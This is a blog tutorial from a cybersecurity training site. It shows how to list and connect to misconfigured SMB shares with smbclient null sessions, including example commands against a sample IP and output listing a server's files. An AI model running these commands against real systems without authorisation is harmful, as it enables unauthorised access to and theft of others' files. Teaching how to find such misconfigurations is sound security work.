Home 0P3N Blog How to Exploit a Poorly Configured SMB
Ready to Start Your Career?
Create Free Account
By: Kl4us
August 1, 2016

How to Exploit a Poorly Configured SMB

By: Kl4us
August 1, 2016
By: Kl4us
August 1, 2016

What's an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that's incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

Exploiting Badly Configured SMB'S

What you'll need:
  1. A machine that can run smbclient command
  2. A vulnerable/poorly configured SMB machine (remote or local)
  3. SMB PORT: 445
Computer network

Steps:

Check Sharenames

To view smb share names use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = ip of vulnerable smb)

Sign up now for a free 7 Day Trial today to enroll in these Career Paths:


You'll get something like this:

`WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Sharename Type Comment
--------- ---- -------
arquivos     Disk
IPC$           IPC IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Server Comment
--------- -------
SAMBA Samba Server 4.3.9-Ubuntu


Workgroup Master
--------- -------
COMPUTACAO SAMBA `

After doing that, you'll need to pick a Sharename. For example "arquivos" or "IPC$". I highly recommend you to pick one that doesn't have the symbol "$", because it's easy to get one with permissions.

In this case, I'm going to pick "arquivos" as Sharename.

Finally:

smbclient //192.168.25.1/arquivos -N

And, that's pretty much it...
Now, if your host is totally vulnerable, you can upload files, download files, etc.

EX:

` WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: > ls
. D 0 Tue Jul 19 09:12:48 2016
.. D 0 Fri May 22 09:25:21 2015
html D 0 Fri Jul 15 03:48:38 2016
codeigniter D 0 Fri Jul 3 17:00:48 2015
serverconfig.php A 100402 Fri Jul 15 03:48:46 2016
phpmyadmin D 0 Fri May 22 16:28:47 2015
khy AR 0 Tue Jul 19 09:12:48 2016
cgitelnet1 D 0 Fri Jul 15 05:40:41 2016
supp1.1 D 0 Tue Jul 7 19:35:09 2015
index.html N 142 Tue May 10 16:30:59 2016
teste.php A 21 Fri May 22 11:56:35 2015
enxjdf.exe N 571074 Mon Apr 14 16:06:33 2008
cherno.php N 210752 Fri Jul 15 05:13:46 2016

151380148 blocks of size 1024. 132224492 blocks available
smb: > `

You can view all the smbclient commands by typing "?"

`smb: > ?
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del dir du
echo exit get getfacl geteas
hardlink help history iosize lcd
link lock lowercase ls l
mask md mget mkdir more
mput newer notify open posix
posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink
print prompt put pwd q
queue quit readlink rd recurse
reget rename reput rm rmdir
showacls setea setmode scopy stat
symlink tar tarmode timeout translate
unlock volume vuid wdel logon
listconnect showconnect tcon tdis tid
logoff .. ! `




I made a Python script that does all the hard work; if you want, you can get it here.

Start Learning Cyber Security today by enrolling in these Courses Now:
Request Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry